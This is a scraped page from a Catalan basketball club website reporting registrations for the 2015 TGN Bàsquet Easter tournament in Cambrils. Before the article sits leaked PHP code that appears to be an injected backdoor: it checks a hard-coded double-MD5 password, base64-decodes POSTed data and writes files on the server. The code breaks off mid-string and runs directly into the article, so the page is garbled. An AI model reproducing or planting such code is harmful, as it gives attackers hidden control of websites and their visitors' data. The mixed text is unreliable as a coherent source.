function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Torneig de Cambrils ja compta amb gairebé els mateixos inscrits que l'any passat - Tgn Bàsquet Club -

El Torneig de Cambrils ja compta amb gairebé els mateixos inscrits que l’any passat

By
Updated: gener 9, 2015

Quan encara falten dos mesos i mig, el Torneig de Setmana Santa de Cambrils que organitza el TGN Bàsquet ja compta amb gairebé els mateixos inscrits que l’edició passada. Així, hi ha 46 conjunts confirmats i s’espera que la xifra pugui arribar als 60, un fet que suposaria tot un rècord perquè la participació més alta es va registrar fa 6 anys amb 56 equips.

Enguany la internacionalització del Torneig continua sent un fet amb la presència del Toulouse Travel Team i el Meteors, de Dublín (Irlanda). A banda, com sempre, hi ha la participació de nombrosos clubs catalans i de la resta de l’estat.

INFORMACIÓ I INSCRIPCIONS

INFORMACIÓN E INSCRIPCIONES

INFORMATION AND REGISTRATION

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *